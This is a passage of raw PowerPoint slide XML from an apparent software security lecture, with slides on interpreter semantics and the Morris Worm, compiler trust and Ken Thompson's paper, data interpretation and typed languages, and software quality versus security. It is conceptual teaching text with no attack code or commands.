                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>checks</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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>c.f. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Morris </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Worm </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sendmail</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Interpreter incorrectly handles</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>semantics</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Hence care needed in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>design/implement</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27</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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611627" y="1006855"/>
            <a:ext cx="4833620" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Correct Machine</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1879346"/>
            <a:ext cx="7993380" cy="4540885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="64135" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="122555" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="505"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Ensure machine instructions correctly implement  high-level language</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="295"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>often ignored by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>programmers</a:t>
            </a:r>
            <a:endParaRPr sz="28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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>assume compiler/interpreter is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>correct</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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>c.f. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Ken </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Thompson’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-105" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>paper</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="285115" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="760"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Requires comparing machine code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>original  source</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="295"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>slow and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> difficult</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="5080" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>required for higher Common Criteria </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Evaluation  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Assurance </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Levels</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(EALs)</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28</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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630677" y="1006855"/>
            <a:ext cx="4795520" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Correct Data</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Interpretation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1985274"/>
            <a:ext cx="7281545" cy="4177665"/>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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Data stored as bits/bytes in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>computer</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grouped as </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>words, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>longwords</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>etc</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interpretation depends on machine</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>instruction</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="223520" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="715"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Languages provide </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>different </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>capabilities for  restricting/validating data</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use</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strongly </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>typed languages </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>limited,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>safer</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others </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>liberal, flexible, less </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>safe </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-130" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>C</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Strongly typed languages are safer</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29</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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482850" y="1006855"/>
            <a:ext cx="5092700" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Software Quality vs</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1909042"/>
            <a:ext cx="8010525" cy="4703445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="59055" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Software quality and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>reliability</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>accidental failure of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>program</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>theoretically random </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>unanticipated</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>input</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improve </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>structured design </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>testing</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not how many errors, but how often</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>triggered</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="355"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Software security is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>related</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="5080" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="725"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>but attacker chooses input distribution, specifically  targeting buggy code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>triggered by often very unlikely</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>inputs</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>common tests </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>don’t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>identify</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926576" y="6888788"/>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3</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">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954527" y="1006855"/>
            <a:ext cx="4149090" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
